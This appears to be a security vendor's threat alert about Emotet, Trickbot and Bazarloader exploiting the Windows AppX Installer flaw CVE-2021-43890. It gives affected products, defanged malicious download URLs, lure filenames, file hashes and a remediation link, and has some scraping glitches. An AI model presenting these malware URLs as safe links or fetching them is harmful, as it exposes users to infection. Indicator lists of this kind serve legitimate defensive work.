February 17, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Rewterz Threat Alert – Amadey Botnet – Active IOCs
February 8, 2022Rewterz Threat Alert – Orcus RAT – Active IOCs
February 8, 2022Rewterz Threat Alert – Amadey Botnet – Active IOCs
February 8, 2022Rewterz Threat Alert – Orcus RAT – Active IOCs
February 8, 2022
Severity
High
Analysis Summary
Major threat groups like Emotet, Trickbot, and Bazarloader have been actively exploiting a Microsoft vulnerability tracked as CVE-2021-43890.
CVE-2021-43890
Microsoft Windows could allow a remote authenticated attacker to conduct a spoofing attack, caused by a flaw in the AppX Installer. By persuading a victim to install specially crafted packages, an attacker could exploit this vulnerability to conduct a spoofing attack.
According to Microsoft ,”An attacker could craft a malicious attachment to be used in phishing campaigns. The attacker would then have to convince the user to open the specially crafted attachment. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”
To stop the threat actors from abusing the ms-appinstaller protocol, Microsoft temporarily disabled the protocol. The MSIX app package format preserves the functionality of enabling new, modern packaging in addition to existing app packages and/or installation files. This protocol makes its easier for the user to ensure a smooth installation experience and to keep applications updated. With this protocol, the user can install apps without the need to download the entire MSIX package.
Impact
- Malware Infection
- Spoofing
Affected Vendors
Microsoft
Affected Products
- Microsoft Windows 10 x32
- Microsoft Windows 10 x64
- Microsoft Windows 10 1809 for x64-based Systems
- Microsoft Windows Server 2016
- Microsoft Windows 10 1809 for 32-bit Systems
- Microsoft Windows 10 1809 for ARM64-based Systems
- Microsoft Windows 10 1607 for 32-bit Systems
- Microsoft Windows 10 1607 for x64-based Systems
- Microsoft Windows Server version 1909
- Microsoft Windows 10 2004 for 32-bit Systems
- Microsoft Windows 10 2004 for ARM64-based Systems
- Microsoft Windows 10 2004 for x64-based Systems
- Microsoft Windows 10 1909 for 32-bit Systems
- Microsoft Windows 10 1909 for x64-based Systems
- CONFIDENTIAL 3
- Microsoft Windows 10 1909 for ARM64-based Systems
- Microsoft Windows 10 20H2 for 32-bit Systems
- Microsoft Windows 10 20H2 for ARM64-based Systems
- Microsoft Windows 10 20H2 for x64-based Systems
- Microsoft Windows Server (Server Core installation) 1909
- Microsoft Windows Server (Server Core installation) 2004
- Microsoft Windows Server (Server Core installation) 20H2
- Microsoft Windows Server (Server Core installation) 2016
- Microsoft Windows 10 21H1 for 32-bit Systems
- Microsoft Windows 10 21H1 for ARM64-based Systems
- Microsoft Windows 10 21H1 for x64-based Systems
- Microsoft App Installer
Indicators of Compromise
CVE
- CVE-2021-43890
Filename
- COVID 19 LETTER[.]xls
- Covid Test Results[.]xls
- COVID-19-07[.]02[.]22[.]xls
- 401K COVID-19 Options[.]xls
- COVID results[.]xls
MD5
- aa44678e2c740b188e95fda91bbccc82
- f337dd15ab013d482275fae623464c34
SHA-256
- df74062200f197a2fb8a5bc63b950e2ec9425005900cd2a1a273fdd53b1bc795
- 937dc9c1d35085a37333f1af629af0c884480e8fea555682f831160d8e968486
SHA-1
- 2fe098078bdfb0771cc67b6835abf01209a64408
- 067d5e8e3b896983fe9a6b50ded0a17ee09f8716
URL
- http[:]//wyldfyrearabians[.]com/cgi/1HyEagziS/
- https[:]//www[.]madridvisits[.]com/e7gnd/pXk/
- http[:]//tatatrucksblog[.]tatamotors[.]com/wp-includes/ttywllmLfAdU51d5O/
- http[:]//pickuptnblog[.]tatamotors[.]com/iyc6qmm/11lz0UGDvT/
- https[:]//shejiguanjia[.]com/wp-includes/PjsuDhy5/
- https[:]//fullness-safety[.]com/-/P6x/
- https[:]//nabajyotifoundation[.]com/da8uc7jo/4Za/
- https[:]//dwwmaster[.]com/wp-content/ebHTB4UF2/
- http[:]//formula8020[.]com/css/56Dzi0P/
- https[:]//calad-formation[.]fr/r3x94z/kgZ9OGCi/
- http[:]//lissbernardin[.]com/hthjb3i/x9KHpCeYrr/
- http[:]//royalsnackmyanmar[.]com/wp-includes/GMtz6DxM/
- http[:]//pristineservices[.]findfacts[.]co[.]in/cgi-bin/BuLyc2HKLHIQVHQLc/
- http[:]//speedrankingsystem[.]de/wp-admin/k63ZcimPsE6/
- https[:]//tigela[.]org[.]np/wp-content/Irp27O71/
- https[:]//royaltyrealtynsb[.]com/backup_1/g51THhhLLUqodx6/
- http[:]//bachilleratoporciclos[.]co/wp-content/PvIIx7/
- https[:]//edu-media[.]cn/wp-admin/cKi/
- https[:]//edu-media[.]cn/wp-admin/cKi/
- https[:]//rtd[.]b2bpipe[.]cn/wp-content/8ESRhIJAIRh/
- Remediation
- Remove the ‘ms-appinstaller:?source=’ if using ms-appi
Remediation
Remove the ‘ms-appinstaller:?source=’ if using ms-appinstaller protocol on website.
Visit the website for downloading pateches, updates, and workarounds
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890